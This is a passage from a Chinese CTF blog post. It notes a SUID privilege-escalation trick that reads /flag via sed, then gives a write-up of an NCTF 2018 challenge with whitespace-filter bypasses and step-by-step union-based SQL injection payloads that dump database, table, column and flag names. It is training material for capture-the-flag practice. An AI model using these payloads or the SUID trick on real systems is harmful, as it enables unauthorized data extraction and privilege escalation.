<p>linux用SUID<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/272617.html">简谈SUID提权 - FreeBuf网络安全行业门户</a></p>
<p># 搜索 SUID file 可执行文件 find / -type f -perm /4000 2&gt;/dev/null </p>
<p>利用 sed 命令查看 flag /bin/sed ‘1p’ /flag![屏幕截图 2022-09-03 135245](/../../做题的截图/屏幕截图 2022-09-03 135245.png)</p>
<h5 id="NCTF-2018-滴-晨跑打卡（WEB-PHP-SQL注入）"><a href="#NCTF-2018-滴-晨跑打卡（WEB-PHP-SQL注入）" class="headerlink" title="[NCTF 2018]滴!晨跑打卡（WEB PHP SQL注入）"></a>[NCTF 2018]滴!晨跑打卡（WEB PHP SQL注入）</h5><p>先fuzz一下</p>
<p>绕空格的一些常用方法：%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /<em>!</em>/</p>
<p>看到空格被注入了，绕过空格的<code>%0a</code>，<code>/**/</code>都被过滤了，但是<code>%a0</code>没有过滤</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="operator">%</span><span class="number">27</span><span class="operator">%</span>a0union<span class="operator">%</span>a0select<span class="operator">%</span>a01,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span><span class="operator">%</span><span class="number">27</span>#</span><br></pre></td></tr></table></figure>

<p>爆库</p>
<p>id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(SCHEMA_NAME)%a0FROM%a0information_schema.SCHEMATA),3,4%271</p>
<p>爆表名</p>
<p>cgctf</p>
<p>id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(table_name)%a0FROM%a0information_schema.tables%a0where%a0table_schema=%22cgctf%22),3,4%27</p>
<p>爆列名</p>
<p>pcnumber</p>
<p>id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(column_name)%a0FROM%a0information_schema.columns%a0where%a0table_name=%22pcnumber%22),3,4%27</p>
<p>爆字段：</p>
<p>flag</p>
<p>id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(flag)%a0FROM%a0cgctf.pcnumber),3,4%27</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">shianer</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2022/09/01/nssctf-3/">http://example.com/2022/09/01/nssctf-3/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">shianer</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                                    <span class="chip bg-color">ctf题目--web</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2022/09/11/buu-4/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/22.jpg" class="responsive-img" alt="buu--4">
                        
                        <span class="card-title">buu--4</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-09-11
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            shianer
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/misc/">
                        <span class="chip bg-color">misc</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/08/30/nssctf-2/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/13.jpg" class="responsive-img" alt="nssctf2">
                        
                        <span class="card-title">nssctf2</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-08-30
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            shianer
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                        <span class="chip bg-color">ctf题目--web</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>






    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">shianer</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shianer" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:292595085@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=292595085" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 292595085" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    
	
     <!--动态线条背景-->
     <script type="text/javascript"
     color="122 103 238" opacity='0.7' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
     </script>	
	

</body>

</html>
